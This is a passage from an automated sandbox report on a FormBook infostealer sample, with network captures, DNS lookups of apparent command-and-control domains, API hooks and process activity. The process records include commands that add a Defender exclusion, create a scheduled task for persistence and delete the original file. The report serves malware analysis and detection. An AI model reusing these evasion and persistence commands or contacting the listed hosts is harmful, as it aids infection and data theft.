                  Dec 2, 2021 19:55:56.512080908 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.512226105 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.701594114 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711364031 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711425066 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711478949 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711519003 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711551905 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711554050 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.711579084 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3
                  Dec 2, 2021 19:55:56.711585999 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.711674929 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.712698936 CET | 49786 | 80 | 192.168.2.3 | 208.51.62.42
                  Dec 2, 2021 19:55:56.902086973 CET | 80 | 49786 | 208.51.62.42 | 192.168.2.3

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Dec 2, 2021 19:55:56.287297010 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
                  Dec 2, 2021 19:55:56.309746027 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
                  Dec 2, 2021 19:56:39.064629078 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                  Dec 2, 2021 19:56:39.208022118 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Dec 2, 2021 19:55:56.287297010 CET | 192.168.2.3 | 8.8.8.8 | 0x7ccd | Standard query (0) | www.purelai.store | A (IP address) | IN (0x0001)
                  Dec 2, 2021 19:56:39.064629078 CET | 192.168.2.3 | 8.8.8.8 | 0x35ec | Standard query (0) | www.archedbeautynw.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Dec 2, 2021 19:55:56.309746027 CET | 8.8.8.8 | 192.168.2.3 | 0x7ccd | No error (0) | www.purelai.store | purelai.store | | CNAME (Canonical name) | IN (0x0001)
                  Dec 2, 2021 19:55:56.309746027 CET | 8.8.8.8 | 192.168.2.3 | 0x7ccd | No error (0) | purelai.store | | 208.51.62.42 | A (IP address) | IN (0x0001)
                  Dec 2, 2021 19:56:39.208022118 CET | 8.8.8.8 | 192.168.2.3 | 0x35ec | No error (0) | www.archedbeautynw.com | | 192.185.0.218 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.purelai.store

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49786 | 208.51.62.42 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Dec 2, 2021 19:55:56.512226105 CET | 7959 | OUT | GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1
                  Host: www.purelai.store
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 19:55:56.711364031 CET | 7960 | IN | HTTP/1.1 200 OK
                  Date: Thu, 02 Dec 2021 18:55:56 GMT
                  Server:
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  X-Content-Type-Options: nosniff
                  Content-Length: 5855
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 36 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 36 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 37 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 62 72 20 2f 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 39 43 38 39 35 30 3b 20 22 3e 20 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 20 3c 2f 64 69 76 3e 20 20 3c 62 72 20 2f 3e 3c 64 69 76 20 69 64 3d 22 61 72 74 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 62 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <title>purelai.store</title> <link rel="stylesheet" href="images/style.css" type="text/css" media="screen" /> ...[if IE 6]><link rel="stylesheet" href="images/style.ie6.css" type="text/css" media="screen" /><![endif]--> ...[if IE 7]><link rel="stylesheet" href="images/style.ie7.css" type="text/css" media="screen" /><![endif]--> <script type="text/javascript" src="images/script.js"></script></head><body><br /><div style=" text-align:center; font-size:30px; color: #9C8950; "> purelai.store </div> <br /><div id="art-main"> <div class="art-sheet"> <div class="art-sheet-tl"></div> <div class="art-sheet-tr"></div> <div class="art-sheet-bl"></div> <div cla
                  Dec 2, 2021 19:55:56.711425066 CET | 7961 | IN | Data Raw: 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 62 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 63 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: ss="art-sheet-br"></div> <div class="art-sheet-tc"></div> <div class="art-sheet-bc"></div> <div class="art-sheet-cl"></div> <div class="art-sheet-cr"></div> <div class="art-sheet-cc">
                  Dec 2, 2021 19:55:56.711478949 CET | 7963 | IN | Data Raw: 61 73 73 3d 22 61 72 74 2d 6c 61 79 6f 75 74 2d 63 65 6c 6c 20 61 72 74 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 70 6f 73
                  Data Ascii: ass="art-layout-cell art-content"> <div class="art-post"> <div class="art-post-body"> <div class="art-post-inner art-article"><br /><br />
                  Dec 2, 2021 19:55:56.711519003 CET | 7964 | IN | Data Raw: 63 65 3d 22 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 73 74 72 6f 6e 67 3e 3c 66 6f 6e 74 20 73 69 7a 65 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: ce="Verdana, Arial, Helvetica, sans-serif"><strong><font size="1"> </font></strong></font></p> </form></center><br /><br /><br /><br />
                  Dec 2, 2021 19:55:56.711551905 CET | 7965 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64
                  Data Ascii: </div> </div> </div> </div> </div> <div class="cleared"></div><div class="art-footer"> <div class="art-foo


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function Name | Hook Type | Active in Processes
                  PeekMessageA | INLINE | explorer.exe
                  PeekMessageW | INLINE | explorer.exe
                  GetMessageW | INLINE | explorer.exe
                  GetMessageA | INLINE | explorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function Name | Hook Type | New Data
                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE1
                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE1

                  Statistics

                  (Charts: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior; not reproduced in the text version of the report.)

                  System Behavior

                  General

                  Start time: 19:54:31
                  Start date: 02/12/2021
                  Path: C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase: 0x360000
                  File size: 684032 bytes
                  MD5 hash: 213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: .Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation: low

                  General

                  Start time: 19:54:34
                  Start date: 02/12/2021
                  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Imagebase: 0x940000
                  File size: 430592 bytes
                  MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: .Net C# or VB.NET
                  Reputation: high

                  General

                  Start time: 19:54:34
                  Start date: 02/12/2021
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff7f20f0000
                  File size: 625664 bytes
                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 19:54:35
                  Start date: 02/12/2021
                  Path: C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Imagebase: 0xf0000
                  File size: 185856 bytes
                  MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 19:54:36
                  Start date: 02/12/2021
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff7f20f0000
                  File size: 625664 bytes
                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 19:54:37
                  Start date: 02/12/2021
                  Path: C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase: 0x330000
                  File size: 684032 bytes
                  MD5 hash: 213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 19:54:39
                  Start date: 02/12/2021
                  Path: C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase: 0x520000
                  File size: 684032 bytes
                  MD5 hash: 213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation: low

                  General

                  Start time: 19:54:42
                  Start date: 02/12/2021
                  Path: C:\Windows\explorer.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\Explorer.EXE
                  Imagebase: 0x7ff720ea0000
                  File size: 3933184 bytes
                  MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation: high

                  General

                  Start time: 19:55:05
                  Start date: 02/12/2021
                  Path: C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\SysWOW64\autoconv.exe
                  Imagebase: 0x990000
                  File size: 851968 bytes
                  MD5 hash: 4506BE56787EDCD771A351C10B5AE3B7
                  Has elevated privileges: false
                  Has administrator privileges: false
                  Programmed in: C, C++ or other language
                  Reputation: moderate

                  General

                  Start time: 19:55:17
                  Start date: 02/12/2021
                  Path: C:\Windows\SysWOW64\NETSTAT.EXE
                  Wow64 process (32bit): true
                  Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
                  Imagebase: 0x1050000
                  File size: 32768 bytes
                  MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation: moderate

                  General

                  Start time: 19:55:19
                  Start date: 02/12/2021
                  Path: C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit): true
                  Commandline: /c del "C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase: 0xd80000
                  File size: 232960 bytes
                  MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 19:55:20
                  Start date: 02/12/2021
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff7f20f0000
                  File size: 625664 bytes
                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Disassembly

                  Code Analysis

                    Executed Functions

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00DAB8F0
                    • GetCurrentThread.KERNEL32 ref: 00DAB92D
                    • GetCurrentProcess.KERNEL32 ref: 00DAB96A
                    • GetCurrentThreadId.KERNEL32 ref: 00DAB9C3
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: d60dcf106f92ed14a900657716e1eae29eac8a1402c33872637d9bcfaf2ecb2e
                    • Instruction ID: 89db87bf613ca57d18c6375eaf222f536cd68e5074164c5552ca19696c1a7747
                    • Opcode Fuzzy Hash: d60dcf106f92ed14a900657716e1eae29eac8a1402c33872637d9bcfaf2ecb2e
                    • Instruction Fuzzy Hash: 0B5176B09006488FDB10CFAAD6487DEBBF4BF49314F2489AAE119A7351C7749845CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00DAB8F0
                    • GetCurrentThread.KERNEL32 ref: 00DAB92D
                    • GetCurrentProcess.KERNEL32 ref: 00DAB96A
                    • GetCurrentThreadId.KERNEL32 ref: 00DAB9C3
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: 47100a05bb0b0f2e896d4d42ef337332e94262b48fe1e657cc61112fce331561
                    • Instruction ID: 9d7a5ac5f26d36ab8e3ecae6de5fb6d9e0fbb8480d8f57832a31f4a0b43deed4
                    • Opcode Fuzzy Hash: 47100a05bb0b0f2e896d4d42ef337332e94262b48fe1e657cc61112fce331561
                    • Instruction Fuzzy Hash: 6B5165B09006488FDB14CFAAD6487DEBBF4BF49314F24895AE119A7351C7749844CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00DA97EE
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 10ca8c59dc2fc82893eaefb07ceaeae2e6692c8358145c2c64467ef5dc10021d
                    • Instruction ID: 0253eec88fad80654f6d12bf79423ce243da1ca7806e1cba37b1379d1f72f2fd
                    • Opcode Fuzzy Hash: 10ca8c59dc2fc82893eaefb07ceaeae2e6692c8358145c2c64467ef5dc10021d
                    • Instruction Fuzzy Hash: 78713470A00B058FDB24CF6AD0657AAB7F5BF89304F04892DE49AD7A40DB75E905CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00DA5421
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 1eb0de50ab91f0d3dc2ef050f6744d0c4290854737c678d38bd9056ec7c376ba
                    • Instruction ID: 58c6229234db245c079fff4202c75b7e0480e5477bbbe423eec6f02731869b58
                    • Opcode Fuzzy Hash: 1eb0de50ab91f0d3dc2ef050f6744d0c4290854737c678d38bd9056ec7c376ba
                    • Instruction Fuzzy Hash: DE41F2B0C00619CBDB24CFA9D8447DEBBB5BF89304F148469D509BB254D7B5594ACFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00DA5421
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: b5f0c1dde9e20393cfae714c763e9c08a2e0b7b593d37e0d5733f1f7d9172608
                    • Instruction ID: da492cf846ea7868934cd4d0d39ae2cecd943f7cdc878b7e0ae65556ecc82655
                    • Opcode Fuzzy Hash: b5f0c1dde9e20393cfae714c763e9c08a2e0b7b593d37e0d5733f1f7d9172608
                    • Instruction Fuzzy Hash: 6641D2B0C0061CCBDB24CFA9D8447CEBBB5BF89304F248469D509BB255DBB5A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DABF47
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 3f25fc09adfdf2473cc537bbd088d3402875b5e282eb1f16e6edc5a77bcc76f7
                    • Instruction ID: 449c26cfdb503e9ad60985e7d2ba237a6a7a0a7a5a3bf845b5815d9b1dccbbae
                    • Opcode Fuzzy Hash: 3f25fc09adfdf2473cc537bbd088d3402875b5e282eb1f16e6edc5a77bcc76f7
                    • Instruction Fuzzy Hash: B921E3B59012099FDB10CFAAD984AEEBBF8FF49324F14841AE914B3311D374A955CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DABF47
